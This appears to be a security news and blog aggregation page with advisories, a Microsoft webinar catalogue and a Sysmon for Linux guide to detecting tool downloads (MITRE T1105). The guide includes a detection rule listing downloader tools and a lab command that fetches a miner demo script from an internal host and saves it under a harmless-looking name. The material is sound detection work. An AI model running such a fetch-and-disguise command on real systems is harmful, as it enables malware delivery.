BLOG

CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus

 Original release date: December 2, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory identifying active exploitation of a vulnerability—CVE-2021-44077—in Zoho ManageEngine ServiceDesk Plus. CVE-2021-44077 is an unauthenticated remote code execution vulnerability that affects all ServiceDesk Plus versions up to, and including, version 11305. 

This vulnerability was addressed by the update released by Zoho on September 16, 2021 for ServiceDesk Plus versions 11306 and above. If left unpatched, successful exploitation of the vulnerability allows an attacker to upload executable files and place webshells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. Zoho has set up a security response plan center that provides additional details, a downloadable tool that can be run on potentially affected systems, and a remediation guide.

CISA encourages organizations to review the joint Cybersecurity Advisory and apply the recommended mitigations immediately.


Fri, 03 Dec 2021 13:13:00 +0000

Actors targeting the IT services sector

 Microsoft has observed multiple Iranian threat actors targeting the IT services sector in attacks that aim to steal sign-in credentials belonging to downstream customer networks to enable further attacks.


Iranian targeting of IT sector on the rise - Microsoft Security Blog


Thu, 18 Nov 2021 17:28:00 +0000

Drupal Releases Security Updates

 Drupal has released security updates to address vulnerabilities that could affect versions 8.9, 9.1, and 9.2. An attacker could exploit these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review Drupal Security Advisory SA-CORE-2021-011 and apply the necessary updates.


Thu, 18 Nov 2021 17:25:00 +0000

Microsoft Recordings | Security Community Webinars


AZURE COMPUTE

2021

Feb 3

Confidential computing nodes on Azure Kubernetes Service

YouTube

Deck

AZURE NETWORK SECURITY

2021

 May 20

Using Attack Simulation to Assess Protection and Detection Capabilities of Azure WAF

 YouTube

 Deck

 May 11

Central DNS Management and Logging with Azure Firewall 

YouTube

 Deck

May 6

Exploring IDPS Capability in Azure Firewall Premium

YouTube

Deck

May 4

Using Azure WAF Policies to Protect Your Web Application at Different Association Levels

YouTube

Deck

Apr 27

Safeguards for a Successful Azure DDoS Protection Standard Deployment

YouTube

Deck

Apr 6

Content Inspection Using TLS Termination with Azure Firewall Premium

YouTube

Deck

2020

 Dec 10

Azure Network Security Advanced Architecture

YouTube 

 Deck

 Dec 8

Azure Network Security for SOCs 

YouTube

 Deck

Dec 3

Getting started with Azure Firewall Manager

YouTube

Deck

Dec 1

Manage application and network connectivity with Azure Firewall

YouTube

Deck

Nov 12

Boosting your Azure Web Application (WAF) deployment

YouTube

Deck

Nov 10

Getting started with Azure Distributed Denial of Service (DDoS) Protection

YouTube

Deck

Oct 27

Protecting your web apps with Azure Web Application Firewall (WAF)

YouTube

Deck

Oct 15

Introduction to Azure Network Security

YouTube

Deck

AZURE PURVIEW

2021

 Jul 29

Discover Multi Cloud Data in Purview

 YouTube

 Deck

 Jun 17

 Better Together: E2E Sensitivity Label Flow from M365 to Azure Purview to SQL to Power BI

 YouTube

Deck 

Jan 27

Introduction to Azure Purview

YouTube

Deck

MICROSOFT 365 DEFENDER

2021

 Oct 11

 l33tSpeak: Advanced Hunting in Microsoft 365 Defender

 YouTube

 Demo

 Sep 15

Webinar Series: Monthly Threat Insights

YouTube

Deck 

Aug 18

Webinar Series: Monthly Threat Insights

YouTube

Deck

Jul 29

Introduction to Microsoft Defender Application Guard for Office

YouTube

 Deck

Jul 21

Webinar series: Monthly Threat Insights

YouTube

Deck

Jul 12

The story behind eSentire MDR with Microsoft 365 Defender: How eSentire streamlined security for itself and its customers

YouTube

Deck

Jun 16

Webinar series: Monthly Threat Insights

YouTube

Deck

May 10

l33tSpeak: Advanced Hunting in Microsoft 365 Defender

YouTube

GitHub

May 3

Microsoft 365 Defender’s Unified Experience for XDR

YouTube

Deck

Feb 22

What Tracking an Attacker Email Infrastructure Tells Us About Persistent Cybercriminal Operations

YouTube

Deck

Jan 28

Protect, Detect, and Respond to Solorigate using Microsoft 365 Defender

YouTube

Deck

2020

Nov 17

l33tSpeak | Advanced hunting in Microsoft 365 Defender

YouTube

Demo

Aug 5

Advanced Hunting series - Episode 4: Let’s hunt! Applying KQL to incident tracking

YouTube

Demo

Jul 29

Advanced Hunting series - Episode 3: Summarizing, Pivoting, and Visualizing Data

YouTube

Demo

Jul 22

Advanced Hunting series - Tracking the Adversary Episode 2: Joins

YouTube

Demo

Jul 15

Advanced Hunting series - Tracking the Adversary Episode 1: KQL Fundamentals

YouTube

Demo

MICROSOFT DEFENDER FOR CLOUD

(formerly Azure Security Center)

2021

Nov 17

NextGen Multi Cloud CSPM in Microsoft Defender for Cloud

YouTube

Deck

Nov 16

Azure Security Ignite 2021 Updates

YouTube

Deck

Oct 27

Azure Defender for SQL

YouTube

Deck

Oct 26

Manage Your Security Risk and Compliance Requirements with Azure Security Center

YouTube

Deck

Oct 20

What’s New in the Last 6 Months

YouTube

Deck

Oct 5

Better Together: Azure Defender, Azure Sentinel, and M365 Defender

YouTube

Deck

Aug 26

Better Together | Azure Security Center and Microsoft Defender for Endpoint

YouTube

Deck

Jul 22

Manejo de Postura de Seguridad de la Nube y Protección de Cargas de Trabajo (Cloud Security Posture Management and Workload Protection)

YouTube

Deck

May 13

Azure Workbooks in Security Center

 YouTube

Deck

 Apr 29

 Demystifying Azure Defender Once for All

 YouTube

 Deck

Apr 28

Automate(d) Security with Azure Security Center and Logic Apps

 YouTube

 Deck

Mar 9

Azure Defender for Storage

 YouTube

 Deck

 Feb 23

 Best Practices for Improving Your Secure Score

 YouTube

 Deck

Jan 7 

Azure service layers protection 

 YouTube

 Deck

 2020

Dec 7

Investigating Azure Security Center alerts using Azure Sentinel

YouTube

Deck

Nov 30

Azure Defender for SQL Anywhere

YouTube

Deck

Nov 9

Ignite 2020 Announcements

YouTube

Deck

Nov 2

Enhance IoT Security & Visibility with Azure Defender and Azure Sentinel 

YouTube

Deck

Oct 28

Multi-Cloud support in Azure Security Center

YouTube

Deck

Oct 26

VM Protection

YouTube

Deck

Mar 11

Security Benchmark Policy

YouTube

Deck

Feb 20

Secure Score enhanced model

YouTube

Deck

 MICROSOFT DEFENDER FOR CLOUD APPS

(formerly Microsoft Cloud App Security)

 2021

 Aug 17

Protect your Slack Deployment using Microsoft Cloud App Security

YouTube

Deck

Jun 8

Protect Your Salesforce Environment Using MCAS

YouTube

Deck

May 25

Improve Your AWS Security Posture Using MCAS

YouTube

Deck

May 12

Protect Your Box Deployment Using MCAS

YouTube

Deck

May 11

How to Protect Your GitHub Environment Using MCAS

YouTube

Deck

 2020

Apr 15

Enabling Secure Remote Work

YouTube

Deck

MICROSOFT DEFENDER FOR ENDPOINT

2021

May 18

Stopping Carbanak+FIN7: Understanding the MITRE Engenuity ATT&CK Results

YouTube

Deck

2020

Sep 16

Get started with Microsoft Defender ATP: from zero to hero

YouTube

Deck

Jul 7

Deploy MDATP capabilities using a phased roadmap

YouTube

Deck

Apr 2

End-to-end security for your endpoints

YouTube

Deck

MICROSOFT DEFENDER FOR IDENTITY

2021

Oct 6

Microsoft Defender for Identity’s Latest Detection Capabilities

YouTube

Deck

Jun 22

MDI in the Microsoft 365 Security Center

YouTube

Deck

Jun 1

Detection Deep Dive with Defender for Identity’s Engineering Experts

YouTube

Deck

Mar 23

Proactive Identity Posture Management

YouTube

Deck

MICROSOFT DEFENDER FOR IoT

(formerly Azure Defender for IoT)

2021

Oct 19

Agent Based Solution for IoT Device

YouTube

Deck

Jan 20

Leveraging OT Behavioral Analytics and Zero Trust for OT Cyber Resilience

YouTube

Deck

2020

Sep 17

MITRE ATT&CK for ICS: CyberX Demo and Azure IoT/OT Security Deep Dive

YouTube

Deck

MICROSOFT SENTINEL

(formerly Azure Sentinel)

2021

Nov 16

Create Your Own Microsoft Sentinel Solutions

YouTube

Deck

Nov 15

Improving the Breadth and Coverage of Threat Hunting with ADX Support, More Entity Types, and Updated MITRE Integration

YouTube

Deck

Nov 10

Decrease Your SOC’s MTTR (Mean Time to Respond) by Integrating Microsoft Sentinel with Microsoft Teams

YouTube

Deck

Nov 9

SAP Mini-Series Part 2: Deep Dive - End-to-End Installation of SAP for Microsoft Sentinel

YouTube

Deck

Nov 8

Latest Innovations for Microsoft’s Cloud Native SIEM

YouTube

Deck

Oct 28

What’s New in Azure Sentinel Automation

YouTube

Deck

Oct 25

Explore the Power of Threat Intelligence in Azure Sentinel

YouTube

Deck

Oct 18

SAP Mini-Series Part 1: Introduction to Monitoring SAP with Azure Sentinel for Security Professionals

YouTube

Deck

Oct 11

Become a Notebooks Ninja – Getting Started with Jupyter Notebooks in Azure Sentinel

YouTube

Deck

Oct 6

Turbocharging ASIM: Making Sure Normalization Helps Performance Rather Than Impacting It

YouTube

Deck*

Sep 29

Better Together | OT and IoT Attack Detection, Investigation and Response

YouTube

Deck

Sep 15

What's New in the Last 6 Months

YouTube

Deck

Sep 14

Learn About Customizable Anomalies and How to Use Them

YouTube

Deck

Aug 18

Fusion ML Detections with Scheduled Analytics Rules

YouTube

Deck

Aug 11

Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content

YouTube

Deck

Jul 28

The Information Model: Understanding Normalization in Azure Sentinel

YouTube

Deck

Jul 20

Streamlining your SOC Workflow with Automated Notebooks

YouTube

Deck

Jul 13

Customizing Azure Sentinel with Python - MSTICPy and Jupyter Notebooks

YouTube

Deck

Jun 29

Threat Intelligence in Action with Anomali

YouTube

Deck

Jun 24

Cost Management in Azure Sentinel - Getting the Most for Your Investment

YouTube

Deck

May 26

Deep Dive into Azure Sentinel Innovations for RSA 2021

YouTube

Deck

Mar 31

Using Azure Data Explorer as Your Long Term Retention Platform of Azure Sentinel Logs

YouTube

Deck

Mar 18

Data Collection Scenarios

YouTube

Deck

Feb 18

Best Practices for Converting Detection Rules from Splunk, QRadar, and ArcSight to Azure Sentinel Rules

YouTube

Deck

Feb 4

Accelerate Your Azure Sentinel Deployment with the All-in-One Accelerator

YouTube 

Deck

Jan 21

Auditing and monitoring your Azure Sentinel workspace

YouTube

Deck

Jan 19

Azure Notebooks Fundamentals – How to get started

YouTube

Deck

Jan 12

Machine Learning detections in the AI-infused Azure Sentinel SIEM

YouTube

Deck

2020

 Sep 30

Unleash your Azure Sentinel automation Jedi tricks and build Logic Apps Playbooks like a Boss

YouTube

Deck

 Sep 29

Enabling User and Entity Behavior Analytics (UEBA) | Hunting for Insider Threats

YouTube

Deck

 Sep 14

Empowering the Azure Sentinel Community with Pre-Recorded Datasets for research and training purposes

YouTube

Deck

 Sep 9

KQL part 3 of 3 - Optimizing Azure Sentinel KQL queries performance

YouTube

Deck

Sep 2

Log Forwarder deep dive | Filtering CEF and Syslog events

YouTube

Deck

Aug 19

Threat intelligence automation with RiskIQ

YouTube

Deck

Aug 12

Threat hunting and reduce dwell times with Azure Sentinel

YouTube

Deck

Jul 28

KQL part 2 of 3: KQL hands-on lab exercises

YouTube

*Deck

Jul 9

Workbooks deep dive - Visualize your security threats and hunts

YouTube

Deck

Jun 23

Multi-tenant investigations

YouTube

Deck

Jun 15

Deploying and Managing Azure Sentinel as Code

YouTube

Deck

Jun 2

KQL part 1 of 3: Learn the KQL you need for Azure Sentinel

YouTube

*Deck

May 13

Using Sigma to accelerate your SIEM transformation to Azure Sentinel

YouTube

Deck

Apr 22

Threat Hunting on AWS using Sentinel

YouTube

Deck

Apr 20

MSSP and Distributed Organization Support

YouTube

Deck

Mar 31

Extending and Integrating Azure Sentinel (APIs)

YouTube

*Deck

Mar 18

Deep Dive on Threat Intelligence

YouTube

Deck

Mar 4

Recap of RSA 2020

YouTube

Deck

Feb 19

Tackling Identity

YouTube

*Deck

Feb 12

Deep Dive on Correlation Rules

YouTube

*Deck

Jan 29

Threat Hunting - revisited

YouTube

Deck

Jan 22

End-to-End SOC scenario

YouTube

Deck

MICROSOFT MISCELLANEOUS SECURITY WEBINARS

CYBERSECURITY FUNDAMENTALS

2021

Oct 21

Hacking AI with Counterfit

YouTube

Deck

Oct 14

Exploiting Vulnerabilities in Azure Stack Hub
(Note: All exploits discussed during the webinar have been addressed.)

YouTube

Deck

Oct 7

Combating Manipulated Media - Media Provenance

YouTube

Deck

Jul 1

Spa Treatments: Web Security in Single Page Applications

YouTube

Deck

Jun 15

Best Practices of Authentication & Authorization Methods

YouTube

Deck

Mar 24

Who Wants a Thousand Free Puppies? Managing Open Source Software Security in The Enterprise

YouTube

Deck

Feb 16

The Billion-Dollar Central Bank Heist

YouTube

Deck

2020

Dec 9

Microsoft Digital Defense Report

YouTube

Deck

Oct 29

Cybersecurity Basics: Securing Yourself

YouTube

Deck

DIVERSITY IN CYBERSECURITY 

2021

Oct 4

Mekonnen Kassa: From a Refugee to Microsoft: Impact of Active Allyship

YouTube

Deck

May 27

Sarah Young: How Unconventional Career Paths are Making a Difference in the Technology

YouTube

Deck

Mar 16

Sue Loh, software engineer at Microsoft and author of the young adult hacker novel Raven, inspires girls and other under-represented groups to enter tech. 

YouTube

Deck



Thu, 18 Nov 2021 15:17:00 +0000

MITRE ATT&CK technique coverage with Sysmon for Linux

 Thanks to Kevin Sheldrake, Roberto Rodriguez, Jessen Kurien and Ofer Shezaf for making this blog possible.

 

For many years, people have been using Sysmon on their Windows systems to gain clarity on what is happening on their machines and, for the security community, to highlight when suspicious or malicious activity occurs. Collecting events from individual hosts is crucial to ensuring you have the visibility needed to identify and respond to malicious events and Sysmon provides a way to do just that. With the introduction of Sysmon for Linux, that same clarity is available for many Linux distros.  While we won’t be detailing all the available Sysmon for Linux capabilities in this post, you can find the Sysmon documentation here, read about how to deploy Sysmon in conjunction with Azure Sentinel, look at a quick guide on how you can use Sysmon in conjunction with Azure Sentinel, or look through our GitHub repository where we’ve been experimenting with Sysmon configs for Linux.

 

To frame the conversation around how Sysmon for Linux (shortened to Sysmon from here on out) can be used to create clarity for security teams, we will walk through how Sysmon events can be used to spot a specific MITRE ATT&CK technique. The MITRE ATT&CK Matrix (Linux focused version here) is a well-known and respected framework that many organizations use to think about adversary techniques and assess detection coverage. Just like on the Windows side, Sysmon can be used to highlight tactics and techniques across the matrix. In this blog, we will focus in on the Ingress Tool Transfer technique (ID T1105) and highlight a couple of the Sysmon events that can be used to see it. We observe this technique being used against Linux systems and sensor networks regularly, and while we have tools to alert on this activity, it is still a good idea to ensure you have visibility into the host so you can investigate attacks. To look at this technique, we will show how to enable collection of three useful events, what those events look like when they fire, and how they can help you understand what happened. Additionally, we will show what those events look like in Azure Sentinel.

 

Ingress Tool Transfer (T1105)

It is common to see attackers taking advantage of initial access to a machine by downloading a script or piece of malware. While “living off the land” is still something to watch for, in attacks on our customers and against our sensor network we see attempts to download tools very frequently.  In fact, the MITRE ATT&CK page for Ingress Tool Transfer shows 290 different pieces of malware and activity groups that use this technique, so it is a good place to start showing how Sysmon can help add coverage to different ATT&CK techniques.

 

For this example, we will focus on the five most commonly used tools for downloading scripts and malware that we’ve seen run on our sensor networks. We will look for wget, curl, ftpget, tftp, and lwp-download. You may want to customize this list for your environment, but this will cover the majority of what we see.

 

Create your Sysmon configuration file

Just like Sysmon for Windows, you will want to create configuration files based on the system you are wanting to collect logs for based on the role of the system, your environment, and your collection requirements. The basics of how to write and run a configuration can be found on the Sysmon documentation page and you can see some examples in the MSTIC-Sysmon repo so we'll just focus on what we need for this specific technique. One thing to note is that the Event IDs are consistent between Windows and Linux so Event ID 1 represents process creation events in both environments.

 

We are interested in seeing when an attacker tries to download files to our computer. There are a few ways we can see that behavior reflected. To begin, we know that a process will have to get created to start the download. We also know that a network connection will have to be made and, if the attacker is successful, a file will be written. Lucky for us, Sysmon has us covered for all three of these with ProcessCreate, NetworkConnect, and FileCreate events.

 

Below is a basic configuration that we can use to create those events based on our list of the commonly used tools (it is available in our repo here). You can see we have separate sections for each of the events we want and have said we want to include the listed matches.  The tool name will be in the “Image” field, and we’ve used “end with” because we generally expect to see file paths there (ex. /bin/wget).

 

<!--
  Created: 10/15/2021
  Modified: 10/17/2021
  Technique: Ingress Tool Transfer
  References:
    - https://attack.mitre.org/techniques/T1105/
-->
<Sysmon schemaversion="4.81">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or">
          <Image condition="end with">wget</Image>
          <Image condition="end with">curl</Image>
          <Image condition="end with">ftpget</Image>
          <Image condition="end with">tftp</Image>
          <Image condition="end with">lwp-download</Image>
        </Rule>
      </ProcessCreate>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <NetworkConnect onmatch="include">
        <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or">
          <Image condition="end with">wget</Image>
          <Image condition="end with">curl</Image>
          <Image condition="end with">ftpget</Image>
          <Image condition="end with">tftp</Image>
          <Image condition="end with">lwp-download</Image>
        </Rule>
      </NetworkConnect>
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <FileCreate onmatch="include">
        <Rule name="TechniqueID=T1105,TechniqueName=Ingress Tool Transfer" groupRelation="or">
          <Image condition="end with">wget</Image>
          <Image condition="end with">curl</Image>
          <Image condition="end with">ftpget</Image>
          <Image condition="end with">tftp</Image>
          <Image condition="end with">lwp-download</Image>
        </Rule>
      </FileCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

 

One thing to note is that both ProcessCreate and ProcessTerminate are enabled by default. If you don't want to collect one of those, you'll need an empty "include" block for that event type, which tells Sysmon to include nothing. Once you have your configuration created and enabled, you'll start seeing events.
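The configuration above repeats the same Image list under each of the three event types, and the note about ProcessTerminate means a fourth block is usually wanted too. The following is an added example (ours, not from the MSTIC-Sysmon repo or the Sysmon project) that generates such a config from a list of tool names and emits the empty ProcessTerminate include; the helper names build_config, add_rule_group and image_rules are ours, while the tool list, rule name and schema version come from the post.

```python
"""Generate a Sysmon for Linux config for the T1105 downloader list.
Added example; helper names are ours, the tool list, rule name and
schemaversion are taken from the post's configuration."""
import xml.etree.ElementTree as ET

# Tools named in the post as the most common downloaders seen on its sensor network.
T1105_TOOLS = ["wget", "curl", "ftpget", "tftp", "lwp-download"]
RULE_NAME = "TechniqueID=T1105,TechniqueName=Ingress Tool Transfer"
# Event types the post uses to observe an ingress tool transfer.
EVENT_TYPES = ["ProcessCreate", "NetworkConnect", "FileCreate"]


def add_rule_group(parent, event_type, tools, onmatch="include"):
    """Append one RuleGroup/<event_type> block with an 'end with' Image rule per tool.
    An empty tools list yields an empty include block, i.e. collect nothing."""
    group = ET.SubElement(parent, "RuleGroup", name="", groupRelation="or")
    event = ET.SubElement(group, event_type, onmatch=onmatch)
    if tools:
        rule = ET.SubElement(event, "Rule", name=RULE_NAME, groupRelation="or")
        for tool in tools:
            # 'end with' because Image carries a full path such as /usr/bin/wget.
            ET.SubElement(rule, "Image", condition="end with").text = tool
    return event


def build_config(tools=T1105_TOOLS, collect_process_terminate=False, schemaversion="4.81"):
    """Return the Sysmon configuration as an XML string.

    ProcessTerminate is on by default in Sysmon, so an empty include block is
    emitted to switch it off unless the caller asks to keep it."""
    root = ET.Element("Sysmon", schemaversion=schemaversion)
    filtering = ET.SubElement(root, "EventFiltering")
    for event_type in EVENT_TYPES:
        add_rule_group(filtering, event_type, tools)
    if not collect_process_terminate:
        add_rule_group(filtering, "ProcessTerminate", [])
    if hasattr(ET, "indent"):  # pretty-print on Python 3.9+
        ET.indent(root)
    return ET.tostring(root, encoding="unicode")


def image_rules(config_xml, event_type):
    """Return the Image patterns configured for event_type (useful when reviewing a config)."""
    root = ET.fromstring(config_xml)
    path = f"./EventFiltering/RuleGroup/{event_type}/Rule/Image"
    return [img.text for img in root.findall(path)]


if __name__ == "__main__":
    print(build_config())
```

Run it and redirect the output to a file you then load with `sysmon -c`; `image_rules` is the quick check that every event type really carries the full tool list before the config goes onto a fleet.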

 

Raw Sysmon events

The Sysmon logs can be found in /var/log/syslog. While you could just look at the raw events there, the SysmonLogView tool makes them easier to read: it takes the Sysmon events and displays them in the more human-readable format shown below. The following command pipes new events from syslog into sysmonLogView:

 

sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView

 

This gives us a running view of what events are being created. We can then run the below command to trigger the rules.


wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh


This command will use wget to call out to a server at 10.0.5.8 port 7000, download the xmrigAttackDemo.sh script, and save it as the script Harmless.sh. xmrigAttackDemo.sh is an internal testing script that I used for this demo.

 

ProcessCreate (Event ID 1):

You can see we get quite a lot of information from the ProcessCreate event. We can see wget in the Image field, the full Command Line, the Current Directory, and the user. You also get Parent Process information although it isn’t as interesting in this example.

 

Event SYSMONEVENT_CREATE_PROCESS
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.533
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  FileVersion: -
  Description: -
  Product: -
  Company: -
  OriginalFileName: -
  CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh
  CurrentDirectory: /home/testUser
  User: testUser
  LogonGuid: {23b1b3a6-0000-0000-e903-000000000000}
  LogonId: 1001
  TerminalSessionId: 38
  IntegrityLevel: no level
  Hashes: -
  ParentProcessGuid: {23b1b3a6-8ed2-6153-0824-7cafd1550000}
  ParentProcessId: 13408
  ParentImage: /bin/bash
  ParentCommandLine: bash

 

NetworkConnect (Event ID 3):

In the NetworkConnect event, we again see wget in the Image field and the user. We also see the protocol, source and destination IP addresses, and the ports involved. Our example command line has the IP listed already so it isn’t new information, but it could be useful in tying the different logs together. You’ll notice the Process IDs also match up as expected.

 

Event SYSMONEVENT_NETWORK_CONNECT
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.543
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  User: testUser
  Protocol: tcp
  Initiated: true
  SourceIsIpv6: false
  SourceIp: 10.0.5.10
  SourceHostname: -
  SourcePort: 40680
  SourcePortName: -
  DestinationIsIpv6: false
  DestinationIp: 10.0.5.8
  DestinationHostname: -
  DestinationPort: 7000
  DestinationPortName: -

 

FileCreate (Event ID 11):

Here we can again see the wget tool and the process Id. We also have the name of the file that was created and its file path.

 

Event SYSMONEVENT_FILE_CREATE
  RuleName: -
  UtcTime: 2021-09-28 21:53:22.536
  ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
  ProcessId: 13409
  Image: /usr/bin/wget
  TargetFilename: /home/testUser/Harmless.sh
  CreationUtcTime: 2021-09-28 21:53:22.536
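The three events share a ProcessGuid and ProcessId, which is what lets you tie them together into one picture of the transfer. The following is an added example (ours, not from the post or from Sysmon) that parses the sysmonLogView "Key: value" layout shown above and correlates the events per process; the sample input is constructed from the post's wget demo plus a second, invented curl run whose download never produced a file, and parse_events and correlate are our own helper names.

```python
"""Correlate Sysmon for Linux events into one record per downloader process.
Added example, not code from the post or from Sysmon. Reads sysmonLogView's
'Key: value' layout; the sample below is constructed (wget values mirror the
post, the curl run is invented to show a transfer that wrote no file)."""
import re
from collections import defaultdict

# Tool list from the post; compared against the basename of Image.
DOWNLOADERS = ("wget", "curl", "ftpget", "tftp", "lwp-download")

# Constructed sample input.
SAMPLE_LOG = """\
Event SYSMONEVENT_CREATE_PROCESS
UtcTime: 2021-09-28 21:53:22.533
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
ProcessId: 13409
Image: /usr/bin/wget
CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh
User: testUser
ParentImage: /bin/bash
Event SYSMONEVENT_NETWORK_CONNECT
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
ProcessId: 13409
Image: /usr/bin/wget
DestinationIp: 10.0.5.8
DestinationPort: 7000
Event SYSMONEVENT_FILE_CREATE
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000}
ProcessId: 13409
Image: /usr/bin/wget
TargetFilename: /home/testUser/Harmless.sh
Event SYSMONEVENT_CREATE_PROCESS
ProcessGuid: {00000000-0000-0000-0000-00000000c0de}
ProcessId: 13510
Image: /usr/bin/curl
CommandLine: curl -o /tmp/x http://10.0.5.8:7000/missing.sh
User: testUser
ParentImage: /bin/bash
Event SYSMONEVENT_NETWORK_CONNECT
ProcessGuid: {00000000-0000-0000-0000-00000000c0de}
ProcessId: 13510
Image: /usr/bin/curl
DestinationIp: 10.0.5.8
DestinationPort: 7000
"""

FIELD_RE = re.compile(r"^([A-Za-z]+): (.*)$")


def parse_events(text):
    """Split sysmonLogView output into a list of {field: value} dicts, one per event."""
    events, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Event "):
            current = {"Event": line.split(" ", 1)[1]}
            events.append(current)
        elif current is not None:
            m = FIELD_RE.match(line)
            if m:
                current[m.group(1)] = m.group(2)
    return events


def correlate(events, downloaders=DOWNLOADERS):
    """Group events by ProcessGuid and summarise each downloader process.

    Returns, in process-creation order, one dict per process with its command
    line, the destinations it connected to and the files it wrote. An empty
    'files' list means no FileCreate fired for that process: the transfer
    failed, or the file was written by a child process."""
    by_guid = defaultdict(list)
    for ev in events:
        by_guid[ev.get("ProcessGuid")].append(ev)
    results = []
    for guid, evs in by_guid.items():
        created = [e for e in evs if e["Event"] == "SYSMONEVENT_CREATE_PROCESS"]
        if not created:
            continue  # connect/file events with no matching ProcessCreate
        proc = created[0]
        # Basename match, stricter than Sysmon's 'end with' (which also matches /bin/notwget).
        if proc.get("Image", "").rsplit("/", 1)[-1] not in downloaders:
            continue
        results.append({
            "guid": guid,
            "pid": int(proc["ProcessId"]),
            "user": proc.get("User"),
            "parent": proc.get("ParentImage"),
            "command": proc.get("CommandLine"),
            "destinations": sorted({f"{e['DestinationIp']}:{e['DestinationPort']}"
                                    for e in evs if e["Event"] == "SYSMONEVENT_NETWORK_CONNECT"}),
            "files": [e["TargetFilename"] for e in evs if e["Event"] == "SYSMONEVENT_FILE_CREATE"],
        })
    return results


if __name__ == "__main__":
    for rec in correlate(parse_events(SAMPLE_LOG)):
        status = "wrote " + ", ".join(rec["files"]) if rec["files"] else "no file written"
        print(f"pid {rec['pid']} ({rec['user']}, parent {rec['parent']}): {rec['command']!r} "
              f"-> {', '.join(rec['destinations'])}; {status}")
```

Feeding it the live `sysmonLogView` output instead of the sample gives a quick triage view: a downloader that connected out but wrote nothing is still worth a look, since the FileCreate may simply belong to a child process or to a tool not on the list.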

 

Viewing in Azure Sentinel

Sysmon events are pushed to Syslog so if you are collecting Syslog events from your Linux machine into Azure Sentinel, you will get the Sysmon events.  For more details on how to make that connection, check out the documentation here.  Also, as the Sysmon events come through with most of the data in the Syslog Message field, you’ll need to parse out the fields you are interested in.  Fortunately, the Azure Sentinel Information Model parsers have you covered. You can install the Parsers from the link here. Once you do, you’ll have access to functions that have taken the guesswork out of parsing.

 

The parsing functions are available under Functions-> Workspace functions. In the below, you can see the Linux Sysmon functions we currently have.

[Screenshot: the Linux Sysmon workspace functions listed in Azure Sentinel]

 

Using the function vimProcessCreateLinuxSysmon, we can see our event reflected. We have narrowed the query to just the event in the example above and chosen to project only a couple of the columns of data.

[Screenshot: vimProcessCreateLinuxSysmon query results for the example event]

From here you can start to include Sysmon as a data source for your hunting queries and analytics.

 

Sysmon for Linux and MITRE ATT&CK

While we didn't dig into all the possible Sysmon events or ATT&CK techniques, hopefully you can see how you can use Sysmon to collect data that will highlight adversary techniques. Sysmon is open source and available in the Sysinternals GitHub. If you have requests or find bugs, check out the Sysmon for Linux project page for the best ways to contact the team. MSTIC has been working with different configs and has started a repo here to share with the community. If you want to see other configs based on MITRE ATT&CK techniques, check them out here and feel free to add suggestions of your own. If you want a config that has all the techniques we've mapped so far, you can find it here. We will continue to come up with new ways to utilize the logs in Azure Sentinel and we look forward to seeing what the community develops. If the amazing work around the Windows version is any indication, we expect that the future of Linux logging is bright.

 

References:



Original  Post here


Thu, 18 Nov 2021 14:08:00 +0000

Security Advisory for BIND

 ISC Releases Security Advisory for BIND

10/28/2021 12:05 PM EDT

 

Original release date: October 28, 2021

The Internet Systems Consortium (ISC) has released a security advisory that addresses a vulnerability affecting multiple versions of the ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition.

CISA encourages users and administrators to review the ISC advisory for CVE-2021-25219 and apply the necessary updates or workaround.


Thu, 18 Nov 2021 14:05:00 +0000

Compromised a JavaScript NPM

Hackers have compromised a JavaScript NPM library with password-stealing malware. The library, UAParser.js, garners 6 million downloads a week. The threat came after hackers hijacked UAParser.js's NPM account. GitHub has warned users that any device with the package installed should be considered compromised.


Thu, 18 Nov 2021 14:01:00 +0000

Microsoft Information Protection (MIP) Ninja Training is Here

 We are very excited and pleased to announce this rendition of the Ninja Training Series. With all the other training out there, our team has been working diligently to get this content out there. There are several videos and resources out there and the overall purpose of the MIP Ninja training is to help you master this realm. We aim to get you up-to-date links to the community blogs, training videos, Interactive Guides, learning paths, and any other relevant documentation. 

 

To make it easier for you to start and advance your knowledge gradually without throwing you in deep waters, we split content in each offering into three levels: beginner, intermediate, and advanced.  

 

In addition, after each section, there will be a knowledge check based on the training material you’d have just finished! Since there’s a lot of content, the goal of these knowledge checks is to help you determine if you were able to get a few of the major key takeaways.  

 

There’ll be a fun certificate issued at the end of the training: Disclaimer: This is NOT an official Microsoft certification and only acts as a way of recognizing your participation in this training content. 

 

Lastly, this training will be updated on a quarterly basis to ensure you all have the latest and greatest material! 


Go here

 


Thu, 18 Nov 2021 13:59:00 +0000

Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

 Please Submit Comments - Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

